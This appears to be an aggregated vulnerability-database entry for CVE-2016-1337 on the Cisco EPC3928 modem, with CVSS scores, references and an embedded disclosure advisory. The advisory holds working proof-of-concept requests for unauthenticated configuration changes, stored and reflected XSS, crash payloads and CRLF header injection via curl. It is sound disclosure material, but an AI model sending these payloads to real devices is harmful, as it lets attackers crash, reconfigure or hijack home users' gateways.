Details of VAR-201607-0005

ID

VAR-201607-0005

CVE

CVE-2016-1337

TITLE

Cisco EPC3928 Vulnerability in obtaining critical settings and credentials on devices

Trust: 0.8

sources: JVNDB: JVNDB-2016-003416

DESCRIPTION

Cisco EPC3928 devices allow remote attackers to obtain sensitive configuration and credential information by making requests during the early part of the boot process, related to a "Boot Information Disclosure" issue, aka Bug ID CSCux17178. The CiscoEPC3928 is a wireless router product from Cisco. A security vulnerability exists in CiscoEPC3928. This issue is being tracked by Cisco Bug ID CSCux17178. Variants of this product can also be affected. Using combination of several vulnerabilities, attacker is able to remotely download and decode boot configuration file, which you can see on PoC video below. The attacker is also able to reconfigure device in order to perform attacks on the home-user, inject additional data to modem http response or extract sensitive informations from the device, such as the Wi-Fi key. Until Cisco releases workarounds or patches, we recommend verify access to the web-based management panel and make sure that it is not reachable from the external network. Vulnerabilities: 1) Unauthorized Command Execution 2) Gateway Stored XSS 3) Gateway Client List DoS 4) Gateway Reflective XSS 5) Gateway HTTP Corruption DoS 6) "Stored" HTTP Response Injection 7) Boot Information Disclosure ======== PoC: - Unathorized Command Execution #1 - Channel selection request: POST /goform/ChannelsSelection HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.1.1/ChannelsSelection.asp Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 24 SAHappyUpstreamChannel=3 #1 - Response: HTTP/1.0 200 OK Server: PS HTTP Server Content-type: text/html Connection: close <html lang="en"><head><title>RELOAD</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><script language="javascript" type="text/javascript" src="../active.js"></script><script language="javascript" type="text/javascript" src="../lang.js"></script><script language="javascript" type="text/javascript">var totaltime=120;function time(){document.formnow.hh.value=(" "+totaltime+" Seconds ");totaltime--;} function refreshStatus(){window.setTimeout("window.parent.location.href='http://192.168.1.1'",totaltime*1000);}mytime=setInterval('time()',1000);</script></head><body BGCOLOR="#CCCCCC" TEXT=black><form name="formnow"><HR><h1><script language="javascript" type="text/javascript">dw(msg_goform34);</script><a href="http://192.168.1.1/index.asp"><script language="javascript" type="text/javascript">dw(msg_goform35);</script></a><script language="javascript">refreshStatus();</script><input type="text" name="hh" style="background-color:#CCCCCC;font-size:36;border:n one"></h1></form></body></html> #2 - Clear logs request: POST /goform/Docsis_log HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.1.1/Docsis_log.asp Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 41 BtnClearLog=Clear+Log&SnmpClearEventLog=0 #2 - Response: HTTP/1.0 302 Redirect Server: PS HTTP Server Location: http://192.168.1.1/Docsis_log.asp Content-type: text/html Connection: close - Gateway Stored and Reflective Cross Site Scripting Example #1: #1 \x96 Stored XSS via username change request: POST /goform/Administration HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.1.1/Administration.asp Cookie: Lang=en; SessionID=2719880 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 165 working_mode=0&sysname=<script>alert('XSS')</script>&sysPasswd=home&sysConfirmPasswd=home&save=Save+Settings&preWorkingMode=1&h_wlan_enable=enable&h_user_type=common #1 \x96 Response: HTTP/1.0 302 Redirect Server: PS HTTP Server Location: http://192.168.1.1/Administration.asp Content-type: text/html Connection: close #2 \x96 Redirect request: GET /Administration.asp HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.1.1/Administration.asp Cookie: Lang=en; SessionID=2719880 DNT: 1 Connection: keep-alive #2 \x96 Response: HTTP/1.1 200 OK Content-type: text/html Expires: Thu, 3 Oct 1968 12:00:00 GMT Pragma: no-cache Cache-Control: no-cache, must-revalidate Connection: close Content-Length: 15832 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html lang="en"> <head> (...) <tr> <td> <script language="javascript" type="text/javascript">dw(usertype);</script> </td> <td nowrap> <script>alert('XSS')</script> </TD> </tr> <tr> (...) Example #2: #1 \x96 Reflected XSS via client list request: POST /goform/WClientMACList HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: 192.168.1.1/WClientMACList.asp Cookie: Lang=en; SessionID=109660 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 62 sortWireless=mac&h_sortWireless=mac" onmouseover=alert(1) x="y #1 \x96 Response: HTTP/1.0 302 Redirect Server: PS HTTP Server Location: 192.168.1.1/WClientMACList.asp Content-type: text/html Connection: close #2 \x96 Redirect request: GET /WClientMACList.asp HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: 192.168.1.1/WClientMACList.asp Cookie: Lang=en; SessionID=109660 Connection: keep-alive #2 \x96 Reponse: HTTP/1.1 200 OK Content-type: text/html Expires: Thu, 3 Oct 1968 12:00:00 GMT Pragma: no-cache Cache-Control: no-cache, must-revalidate Connection: close Content-Length: 7385 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html lang="en"> <head> (...) </table> </div> <input type="hidden" name="h_sortWireless" value="mac" onmouseover=alert(1) x="y" /> </form> </body> </html> (...) - Gateway Client List Denial of Service Device will crash after sending following request. # HTTP Request POST /goform/WClientMACList HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.1.1/WClientMACList.asp Cookie: Lang=en; SessionID=109660 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 62 sortWireless=mac&h_sortWireless=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX - Gateway HTTP Corruption Denial of Service Device will crash after sending following request. # HTTP Request POST /goform/Docsis_system HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.1.1/Docsis_system.asp Cookie: Lang=en; SessionID=348080 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 106 username_login=&password_login=&LanguageSelect=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX&Language_Submit=0&login=Log+In - "Stored" HTTP Response Injection It is able to inject additional HTTP data to response, if string parameter of LanguageSelect won't be too long (in that case device will crash). Additional data will be stored in device memory and returned with every http response on port 80 until reboot. devil@hell:~$ curl -gi http://192.168.1.1/ -s | head -10 HTTP/1.1 200 OK Content-type: text/html Expires: Thu, 3 Oct 1968 12:00:00 GMT Pragma: no-cache Cache-Control: no-cache, must-revalidate Connection: close Content-Length: 1469 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html lang="en"> devil@hell:~$ curl --data "username_login=&password_login=&LanguageSelect=en%0d%0aSet-Cookie: w00t&Language_Submit=0&login=Log+In" http://192.168.1.1/goform/Docsis_system -s > /dev/null devil@hell:~$ curl -gi http://192.168.1.1/ -s | head -10 HTTP/1.1 200 OK Content-type: text/html Expires: Thu, 3 Oct 1968 12:00:00 GMT Pragma: no-cache Cache-Control: no-cache, must-revalidate Connection: close Set-Cookie: Lang=en Set-Cookie: w00t Set-Cookie: SessionID=657670 Content-Length: 1469 - Boot Information Disclosure In early booting phase, for a short period of time some administrator functions can be executed, and it is able to extract device configuration file. We wrote an exploit that crash the modem, and then retrieve and decode config in order to obtain users credentials. Exploit video PoC: https://www.youtube.com/watch?v=PHSx0s7Turo ======== CVE References: CVE-2015-6401 CVE-2015-6402 CVE-2016-1328 CVE-2016-1336 CVE-2016-1337 Cisco Bug ID\x92s: CSCux24935 CSCux24938 CSCux24941 CSCux24948 CSCuy28100 CSCux17178 Read more on our blog: http://secorda.com/multiple-security-vulnerabilities-affecting-cisco-epc3928/

Trust: 2.61

sources: NVD: CVE-2016-1337 // JVNDB: JVNDB-2016-003416 // CNVD: CNVD-2016-04560 // BID: 91541 // VULHUB: VHN-90156 // PACKETSTORM: 137379

IOT TAXONOMY

category:

['Network device']

sub_category:

Trust: 0.6

sources: CNVD: CNVD-2016-04560

AFFECTED PRODUCTS

vendor:	cisco	model:	epc3928	scope:	eq	version:	-	Trust: 1.6
vendor:	cisco	model:	epc3928	scope:	-	version:	-	Trust: 1.4

sources: CNVD: CNVD-2016-04560 // JVNDB: JVNDB-2016-003416 // CNNVD: CNNVD-201606-294 // NVD: CVE-2016-1337

CVSS

SEVERITY

CVSSV2

CVSSV3

NVD:	CVE-2016-1337
value:	HIGH
Trust: 1.8
CNVD:	CNVD-2016-04560
value:	MEDIUM
Trust: 0.6
CNNVD:	CNNVD-201606-294
value:	MEDIUM
Trust: 0.6
VULHUB:	VHN-90156
value:	MEDIUM
Trust: 0.1

NVD:
severity:	MEDIUM
baseScore:	4.3
vectorString:	AV:N/AC:M/AU:N/C:P/I:N/A:N
accessVector:	NETWORK
accessComplexity:	MEDIUM
authentication:	NONE
confidentialityImpact:	PARTIAL
integrityImpact:	NONE
availabilityImpact:	NONE
exploitabilityScore:	8.6
impactScore:	2.9
acInsufInfo:	FALSE
obtainAllPrivilege:	FALSE
obtainUserPrivilege:	FALSE
obtainOtherPrivilege:	FALSE
userInteractionRequired:	FALSE
version:	2.0
Trust: 1.0
NVD:	CVE-2016-1337
severity:	MEDIUM
baseScore:	4.3
vectorString:	AV:N/AC:M/AU:N/C:P/I:N/A:N
accessVector:	NETWORK
accessComplexity:	MEDIUM
authentication:	NONE
confidentialityImpact:	PARTIAL
integrityImpact:	NONE
availabilityImpact:	NONE
exploitabilityScore:	NONE
impactScore:	NONE
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.8
CNVD:	CNVD-2016-04560
severity:	MEDIUM
baseScore:	5.0
vectorString:	AV:N/AC:L/AU:N/C:P/I:N/A:N
accessVector:	NETWORK
accessComplexity:	LOW
authentication:	NONE
confidentialityImpact:	PARTIAL
integrityImpact:	NONE
availabilityImpact:	NONE
exploitabilityScore:	10.0
impactScore:	2.9
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.6
VULHUB:	VHN-90156
severity:	MEDIUM
baseScore:	4.3
vectorString:	AV:N/AC:M/AU:N/C:P/I:N/A:N
accessVector:	NETWORK
accessComplexity:	MEDIUM
authentication:	NONE
confidentialityImpact:	PARTIAL
integrityImpact:	NONE
availabilityImpact:	NONE
exploitabilityScore:	8.6
impactScore:	2.9
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.1

NVD:
baseSeverity:	HIGH
baseScore:	8.1
vectorString:	CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
attackVector:	NETWORK
attackComplexity:	HIGH
privilegesRequired:	NONE
userInteraction:	NONE
scope:	UNCHANGED
confidentialityImpact:	HIGH
integrityImpact:	HIGH
availabilityImpact:	HIGH
exploitabilityScore:	2.2
impactScore:	5.9
version:	3.0
Trust: 1.0
NVD:	CVE-2016-1337
baseSeverity:	HIGH
baseScore:	8.1
vectorString:	CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
attackVector:	NETWORK
attackComplexity:	HIGH
privilegesRequired:	NONE
userInteraction:	NONE
scope:	UNCHANGED
confidentialityImpact:	HIGH
integrityImpact:	HIGH
availabilityImpact:	HIGH
exploitabilityScore:	NONE
impactScore:	NONE
version:	3.0
Trust: 0.8

sources: CNVD: CNVD-2016-04560 // VULHUB: VHN-90156 // JVNDB: JVNDB-2016-003416 // CNNVD: CNNVD-201606-294 // NVD: CVE-2016-1337

PROBLEMTYPE DATA

problemtype:	CWE-200	Trust: 1.9
problemtype:	CWE-264	Trust: 1.9

sources: VULHUB: VHN-90156 // JVNDB: JVNDB-2016-003416 // NVD: CVE-2016-1337

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201606-294

TYPE

information disclosure

Trust: 0.6

sources: CNNVD: CNNVD-201606-294

CONFIGURATIONS

sources: NVD: CVE-2016-1337

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-90156

PATCH

title:	Cisco Model DPC3928/EPC3928 DOCSIS/EuroDOCSIS 3.0 8x4 Wireless Residential Gateway with Embedded Digital Voice Adapter User Guide	url:	http://www.cisco.com/c/dam/en/us/td/docs/video/at_home/cable_modems/3900_series/ol-29161-01.pdf	Trust: 0.8
title:	CiscoEPC3928 Information Disclosure Vulnerability Patch	url:	https://www.cnvd.org.cn/patchinfo/show/78583	Trust: 0.6
title:	Cisco EPC3928 Security vulnerabilities	url:	http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=62592	Trust: 0.6

sources: CNVD: CNVD-2016-04560 // JVNDB: JVNDB-2016-003416 // CNNVD: CNNVD-201606-294

EXTERNAL IDS

db:	NVD	id:	CVE-2016-1337	Trust: 3.5
db:	BID	id:	91541	Trust: 1.4
db:	PACKETSTORM	id:	137379	Trust: 1.3
db:	EXPLOIT-DB	id:	39904	Trust: 1.1
db:	JVNDB	id:	JVNDB-2016-003416	Trust: 0.8
db:	CNNVD	id:	CNNVD-201606-294	Trust: 0.7
db:	CNVD	id:	CNVD-2016-04560	Trust: 0.6
db:	VULHUB	id:	VHN-90156	Trust: 0.1

sources: CNVD: CNVD-2016-04560 // VULHUB: VHN-90156 // BID: 91541 // JVNDB: JVNDB-2016-003416 // PACKETSTORM: 137379 // CNNVD: CNNVD-201606-294 // NVD: CVE-2016-1337

REFERENCES

url:	http://secorda.com/multiple-security-vulnerabilities-affecting-cisco-epc3928/	Trust: 2.6
url:	http://www.securityfocus.com/archive/1/archive/1/538627/100/0/threaded	Trust: 2.0
url:	http://packetstormsecurity.com/files/137379/cisco-epc-3928-xss-dos-command-execution.html	Trust: 1.2
url:	http://www.securityfocus.com/bid/91541	Trust: 1.1
url:	http://www.securityfocus.com/archive/1/538627/100/0/threaded	Trust: 1.1
url:	https://www.exploit-db.com/exploits/39904/	Trust: 1.1
url:	http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1337	Trust: 0.8
url:	http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-1337	Trust: 0.8
url:	http://www.cisco.com/	Trust: 0.4
url:	http://192.168.1.1/index.asp"><script	Trust: 0.1
url:	http://192.168.1.1/administration.asp	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2016-1336	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2016-1337	Trust: 0.1
url:	http://192.168.1.1/docsis_system.asp	Trust: 0.1
url:	http://192.168.1.1/goform/docsis_system	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2015-6401	Trust: 0.1
url:	http://192.168.1.1/channelsselection.asp	Trust: 0.1
url:	https://www.youtube.com/watch?v=phsx0s7turo	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2015-6402	Trust: 0.1
url:	http://192.168.1.1/docsis_log.asp	Trust: 0.1
url:	http://192.168.1.1/	Trust: 0.1
url:	http://192.168.1.1/wclientmaclist.asp	Trust: 0.1
url:	http://secorda.com/)	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2016-1328	Trust: 0.1
url:	http://192.168.1.1'",totaltime*1000);}mytime=setinterval('time()',1000);</script></head><body	Trust: 0.1

sources: CNVD: CNVD-2016-04560 // VULHUB: VHN-90156 // BID: 91541 // JVNDB: JVNDB-2016-003416 // PACKETSTORM: 137379 // CNNVD: CNNVD-201606-294 // NVD: CVE-2016-1337

CREDITS

Patryk Bogdan from Secorda security team.

Trust: 0.3

sources: BID: 91541

SOURCES

db:	CNVD	id:	CNVD-2016-04560
db:	VULHUB	id:	VHN-90156
db:	BID	id:	91541
db:	JVNDB	id:	JVNDB-2016-003416
db:	PACKETSTORM	id:	137379
db:	CNNVD	id:	CNNVD-201606-294
db:	NVD	id:	CVE-2016-1337

LAST UPDATE DATE

2024-02-14T22:51:04.023000+00:00

SOURCES UPDATE DATE

db:	CNVD	id:	CNVD-2016-04560	date:	2016-07-06T00:00:00
db:	VULHUB	id:	VHN-90156	date:	2018-10-09T00:00:00
db:	BID	id:	91541	date:	2016-07-03T00:00:00
db:	JVNDB	id:	JVNDB-2016-003416	date:	2016-07-06T00:00:00
db:	CNNVD	id:	CNNVD-201606-294	date:	2016-07-04T00:00:00
db:	NVD	id:	CVE-2016-1337	date:	2024-02-14T01:17:43.863

SOURCES RELEASE DATE

db:	CNVD	id:	CNVD-2016-04560	date:	2016-07-06T00:00:00
db:	VULHUB	id:	VHN-90156	date:	2016-07-03T00:00:00
db:	BID	id:	91541	date:	2016-07-03T00:00:00
db:	JVNDB	id:	JVNDB-2016-003416	date:	2016-07-06T00:00:00
db:	PACKETSTORM	id:	137379	date:	2016-06-08T13:22:22
db:	CNNVD	id:	CNNVD-201606-294	date:	2016-06-08T00:00:00
db:	NVD	id:	CVE-2016-1337	date:	2016-07-03T21:59:06.727